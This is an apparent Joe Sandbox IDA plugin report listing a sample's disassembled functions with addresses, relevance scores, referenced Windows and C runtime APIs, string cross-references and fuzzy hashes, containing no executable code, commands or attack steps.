Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d2ea9f088fb782eb80c9e054fd409b956419e19c78ebd62b984b8967bf388b01
Instruction ID: afcb231d29dcb1b87c5d2869cdac1606561b7831b50e138b5f9c9ad892e5554c
Opcode Fuzzy Hash: d2ea9f088fb782eb80c9e054fd409b956419e19c78ebd62b984b8967bf388b01
Instruction Fuzzy Hash: 78C19876E00214AFDB20DBA9DD82FEFB7F8EB48704F540556FA04EB282D6749D4187A4

Function 004322F3 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00432362
_free.LIBCMT ref: 00432370
_free.LIBCMT ref: 0043249E
_free.LIBCMT ref: 004324A9

Strings

<E, xrefs: 00432502
<E, xrefs: 004324F2
<E, xrefs: 004324EA

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free
String ID: <E$<E$<E
API String ID: 269201875-3702714833
Opcode ID: d3635cd4395cf2f55f1e01e62719782660dfc7b2c86dd4396c8cdcf27bef4343
Instruction ID: 99ae4ec785f4629524281ac44149def657ec530d162101d869d87c8b1b149a3d
Opcode Fuzzy Hash: d3635cd4395cf2f55f1e01e62719782660dfc7b2c86dd4396c8cdcf27bef4343
Instruction Fuzzy Hash: 0F611431A00315AFDB20DF69D941BAAB7F4EF08310F1441ABEC44EB292D7789D41CB98

Function 0042EABD Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,PYB,00425950,?,?,?,0042ED0E,00000001,00000001,A3E85006), ref: 0042EB17
__alloca_probe_16.LIBCMT ref: 0042EB4F
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0042ED0E,00000001,00000001,A3E85006,?,?,?), ref: 0042EB9D
__alloca_probe_16.LIBCMT ref: 0042EC34
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A3E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0042EC97
__freea.LIBCMT ref: 0042ECA4

Part of subcall function 0042B6AE: RtlAllocateHeap.NTDLL(00000000,004062F6,00000000,?,0041E9AB,00000002,00000000,00000000,00000000,?,0040505A,004062F6,00000004,00000000,00000000,00000000), ref: 0042B6E0

__freea.LIBCMT ref: 0042ECAD
__freea.LIBCMT ref: 0042ECD2

Strings

PYB, xrefs: 0042EACF

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID: PYB
API String ID: 3864826663-1616261379
Opcode ID: 0a5733d1417ba311698d5fb78e534de0b65108093e7d4f0e6a33f59ad447a12e
Instruction ID: 50be8989d0cdca222a1a8b15a6c0acc6d8668c51a51a829594731ec570a01802
Opcode Fuzzy Hash: 0a5733d1417ba311698d5fb78e534de0b65108093e7d4f0e6a33f59ad447a12e
Instruction Fuzzy Hash: 6B51E372710226ABDF258FA7EC45EBB77A9EB80754B54462AFC04D6240DB38DC40D698

Function 00429EE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00429EFA

Part of subcall function 0042B471: HeapFree.KERNEL32(00000000,00000000,?,0043253D,?,00000000,?,00000000,?,004327E1,?,00000007,?,?,00432BD5,?), ref: 0042B487
Part of subcall function 0042B471: GetLastError.KERNEL32(?,?,0043253D,?,00000000,?,00000000,?,004327E1,?,00000007,?,?,00432BD5,?,?), ref: 0042B499

_free.LIBCMT ref: 00429F06
_free.LIBCMT ref: 00429F11
_free.LIBCMT ref: 00429F1C
_free.LIBCMT ref: 00429F27
_free.LIBCMT ref: 00429F32
_free.LIBCMT ref: 00429F3D
_free.LIBCMT ref: 00429F48
_free.LIBCMT ref: 00429F53
_free.LIBCMT ref: 00429F61

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6870dfbc73106e0f47d4072bb30fe3a2cc029a0a9607a66e263cafc03e7db3ad
Instruction ID: 20315c2a73739b51175a77a8c1f508fe211518e45cccb8ba5dcac1b7a787280e
Opcode Fuzzy Hash: 6870dfbc73106e0f47d4072bb30fe3a2cc029a0a9607a66e263cafc03e7db3ad
Instruction Fuzzy Hash: 81116979610128EFCB01EF55E982CE93BA5EF04394B91409ABE484B236D735DE90EB84

Function 00411953 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00411975
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 0041197F
DuplicateHandle.KERNEL32(00000000), ref: 00411986
SafeRWList.LIBCONCRT ref: 004119A5

Part of subcall function 0040F974: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0040F985
Part of subcall function 0040F974: List.LIBCMT ref: 0040F98F

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004119B7
GetLastError.KERNEL32 ref: 004119C6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004119DC

Strings

eventObject, xrefs: 004119AF

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 165577817-1680012138
Opcode ID: 6e4d376d2909b4b5de0020067a9c97fcfa9dd6041b44377838fcd1960b27f7ed
Instruction ID: 65dd89e513bf6264f2a3c03b338d3d6b5947829b5cb795d363af5e2aa7cd7a72
Opcode Fuzzy Hash: 6e4d376d2909b4b5de0020067a9c97fcfa9dd6041b44377838fcd1960b27f7ed
Instruction Fuzzy Hash: AC1182B1900205EACB14EBA5DC59FEF73BCAF04344F20413BB216E51E1DB789A45CBA9

Function 00428FC3 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00429FDA: GetLastError.KERNEL32(?,?,00425F7D,0044EA48,00000010), ref: 00429FDE
Part of subcall function 00429FDA: _free.LIBCMT ref: 0042A011
Part of subcall function 00429FDA: SetLastError.KERNEL32(00000000), ref: 0042A052
Part of subcall function 00429FDA: _abort.LIBCMT ref: 0042A058

_memcmp.LIBVCRUNTIME ref: 0042926D
_free.LIBCMT ref: 004292DE
_free.LIBCMT ref: 004292F7
_free.LIBCMT ref: 00429329
_free.LIBCMT ref: 00429332
_free.LIBCMT ref: 0042933E

Strings

C, xrefs: 0042912B

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 8231f59adc0a95867ace24212eb6dc500f9765a182718d86b51dbbeabdd684fb
Instruction ID: e1032a7d25c56bb8bd96ca16b5bac8fcaee613fdfb390e23b1120e7f01a059c8
Opcode Fuzzy Hash: 8231f59adc0a95867ace24212eb6dc500f9765a182718d86b51dbbeabdd684fb
Instruction Fuzzy Hash: FEB13875A01229DBDB24DF18D884AAEB7B4FF48304F5045EEE909A7351D735AE90CF88

Function 004207C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004207EB
___except_validate_context_record.LIBVCRUNTIME ref: 004207F3
_ValidateLocalCookies.LIBCMT ref: 00420881
__IsNonwritableInCurrentImage.LIBCMT ref: 004208AC
_ValidateLocalCookies.LIBCMT ref: 00420901

Strings

csm, xrefs: 00420896
-A, xrefs: 0042089E, 004208A7, 004208B8

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: -A$csm
API String ID: 1170836740-3707257204
Opcode ID: 1bfbd10e513fba34aa5bbdabb57249e535d9e59d2875bea301e02a5c07674f36
Instruction ID: c1d1cccfa10220d8e2c186561f43a90ae67b18cccbdae8ae732a6dbf7cddaae7
Opcode Fuzzy Hash: 1bfbd10e513fba34aa5bbdabb57249e535d9e59d2875bea301e02a5c07674f36
Instruction Fuzzy Hash: 5F41B534F002289BCB10EF69D88469F7BE5AF44318F54816AE8159B393D7399905CBD5

Function 0041CA5A Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 0041CA73

Part of subcall function 0041CD42: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,0041C7A6), ref: 0041CD52

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0041CA88
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CA97
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0041CB1B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CB5B

Strings

pContext, xrefs: 0041CB53
switchState, xrefs: 0041CA8F

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Concurrency::details::$FreeProcessorRoot::Virtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3459720090-2660820399
Opcode ID: e3141b60b4077819c8eda74dafdde13bfe15880e0ff9450206f4dcfe43ce3c30
Instruction ID: 2167ac5d3fd64fbcb32bbc6d215a951603488090de1096ad221eb52a1edee0a2
Opcode Fuzzy Hash: e3141b60b4077819c8eda74dafdde13bfe15880e0ff9450206f4dcfe43ce3c30
Instruction Fuzzy Hash: EF31C335A402149BCF05EF68DCC1BAE73B5FF48354F20446AE916AB381DB78ED468798

Function 0042B9EF Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,0042C164,?,?,?,?,?,?), ref: 0042BA31
__fassign.LIBCMT ref: 0042BAAC
__fassign.LIBCMT ref: 0042BAC7
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 0042BAED
WriteFile.KERNEL32(?,?,00000000,0042C164,00000000,?,?,?,?,?,?,?,?,?,0042C164,?), ref: 0042BB0C
WriteFile.KERNEL32(?,?,00000001,0042C164,00000000,?,?,?,?,?,?,?,?,?,0042C164,?), ref: 0042BB45

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: ac38d6094f78893026421eb70cfcd21e3e1f3b17b44c43df88ac910b193b4c01
Instruction ID: 49dea62955fe95385339871f68e6dbd67d6b5bddab17c56156a0f7c90f892ed9
Opcode Fuzzy Hash: ac38d6094f78893026421eb70cfcd21e3e1f3b17b44c43df88ac910b193b4c01
Instruction Fuzzy Hash: A551C671E002599FCB10CFA8E885BEEBBF4EF09310F14452BE955E7291D734A941CBA9

Function 0042E9A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,A3E85006,00425112,00000000,00000000,00425950,?,PYB,?,00000001,00425112,A3E85006,00000001,00425950,00425950), ref: 0042E9ED
__alloca_probe_16.LIBCMT ref: 0042EA25
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0042EA76
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0042EA88
__freea.LIBCMT ref: 0042EA91

Part of subcall function 0042B6AE: RtlAllocateHeap.NTDLL(00000000,004062F6,00000000,?,0041E9AB,00000002,00000000,00000000,00000000,?,0040505A,004062F6,00000004,00000000,00000000,00000000), ref: 0042B6E0

Strings

PYB, xrefs: 0042E9B3

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID: PYB
API String ID: 313313983-1616261379
Opcode ID: 9d6fc5497950c60edd51c7008157dc7df7a39a2bb7cca59083f9b8362a5039ec
Instruction ID: 01d24e31ca9a318be20aff72ffc7227b5b702c07ab6a7b9bbfea3e1dbdfa3543
Opcode Fuzzy Hash: 9d6fc5497950c60edd51c7008157dc7df7a39a2bb7cca59083f9b8362a5039ec
Instruction Fuzzy Hash: 8A31D231A0022AABDF24DF66EC85EAF7BA5FB40350F44452AFC05D6290D739DD50CB98

Function 00420DAD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00420E00
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00420E19
FindVITargetTypeInstance.LIBVCRUNTIME ref: 00420E20
PMDtoOffset.LIBCMT ref: 00420E3F

Strings

Bad dynamic_cast!, xrefs: 00420E81

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 9ef4cc080819a1930a087904b3d5e89cb6ddd47c5bd890e6973621b756d2e1df
Instruction ID: 65d1458662eba96e8ef06347f99c81e862a76ba74978cbe02061908ff93b52ef
Opcode Fuzzy Hash: 9ef4cc080819a1930a087904b3d5e89cb6ddd47c5bd890e6973621b756d2e1df
Instruction Fuzzy Hash: 34214972B043259FDB14DFA4ED02B6A77E4FB54724F60861FF81093282DB38E94186A9

Function 00437E71 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c4b07de209a0e78d555cc15b07864f8830c2c8b2888a35c949461ad95cacfbb
Instruction ID: f48278583df8dd40211b818a3b4c29bbbfc0e89f43548fbb6184d65b50ba7211
Opcode Fuzzy Hash: 6c4b07de209a0e78d555cc15b07864f8830c2c8b2888a35c949461ad95cacfbb
Instruction Fuzzy Hash: 3B112EB160C1256FDB306F76AC0592B3A68EF8A764B11556BF851D3280DB388800C7F4

Function 004327C8 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043250F: _free.LIBCMT ref: 00432538

_free.LIBCMT ref: 00432816

Part of subcall function 0042B471: HeapFree.KERNEL32(00000000,00000000,?,0043253D,?,00000000,?,00000000,?,004327E1,?,00000007,?,?,00432BD5,?), ref: 0042B487
Part of subcall function 0042B471: GetLastError.KERNEL32(?,?,0043253D,?,00000000,?,00000000,?,004327E1,?,00000007,?,?,00432BD5,?,?), ref: 0042B499

_free.LIBCMT ref: 00432821
_free.LIBCMT ref: 0043282C
_free.LIBCMT ref: 00432880
_free.LIBCMT ref: 0043288B
_free.LIBCMT ref: 00432896
_free.LIBCMT ref: 004328A1

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 547aba837227c0969493d73b9c98f3b1a3ed0683b26b6e40a51e3bea40e5e0ef
Instruction ID: bf137e70b5ed5c5a9dbd6f84e6e9fe45b981d95a42a9ddaac40a166b1c5a7889
Opcode Fuzzy Hash: 547aba837227c0969493d73b9c98f3b1a3ed0683b26b6e40a51e3bea40e5e0ef
Instruction Fuzzy Hash: 8C11A231500714FAD920BB72CD97FCB779CEF08304F80981EB699E6056DBACB640D684

Function 00404F92 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404FA3
int.LIBCPMT ref: 00404FBA

Part of subcall function 00404B4A: std::_Lockit::_Lockit.LIBCPMT ref: 00404B5B
Part of subcall function 00404B4A: std::_Lockit::~_Lockit.LIBCPMT ref: 00404B75

std::locale::_Getfacet.LIBCPMT ref: 00404FC3
std::_Facet_Register.LIBCPMT ref: 00404FF4
std::_Lockit::~_Lockit.LIBCPMT ref: 0040500A

Strings

x2E, xrefs: 00404FAC

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetfacetRegisterstd::locale::_
String ID: x2E
API String ID: 3122174169-1315242388
Opcode ID: 06e264fb9f9c05c4176ce7a8b034a7bcfb8fad647924caebcc4a7b528f5ab56b
Instruction ID: 394830a538bca8b640bb92ef03547b2d8698ea1b4a18f2ef894024db0a6eb3e2
Opcode Fuzzy Hash: 06e264fb9f9c05c4176ce7a8b034a7bcfb8fad647924caebcc4a7b528f5ab56b
Instruction Fuzzy Hash: E211C2B18001198BCF10EBA4C811AEE7774EF84318F11012EF500BB2D2DB7CAE00CBA9

Function 0042614A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00426176
__cftoe.LIBCMT ref: 004261A8

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f2321dbf6ed94c17b0aeabc5c1ebd97954e1202e32646e52d81e2733d7d0e813
Instruction ID: 57556dc1e8cb97a168bc11338dc45750c133dbf7bb089240f6cfbc610cedebbb
Opcode Fuzzy Hash: f2321dbf6ed94c17b0aeabc5c1ebd97954e1202e32646e52d81e2733d7d0e813
Instruction Fuzzy Hash: 4E510B72B00225EBDB24AB59AC41A7F77A8EF45324FA1415FFC1492282DB3DD910D67C

Function 00420ECA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00420EC1,0041E96F,00438BD0,00000008,00438F35,?,?,?,?,0041BC58,?,?,361DCBD2), ref: 00420ED8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00420EE6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00420EFF
SetLastError.KERNEL32(00000000,?,00420EC1,0041E96F,00438BD0,00000008,00438F35,?,?,?,?,0041BC58,?,?,361DCBD2), ref: 00420F51

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

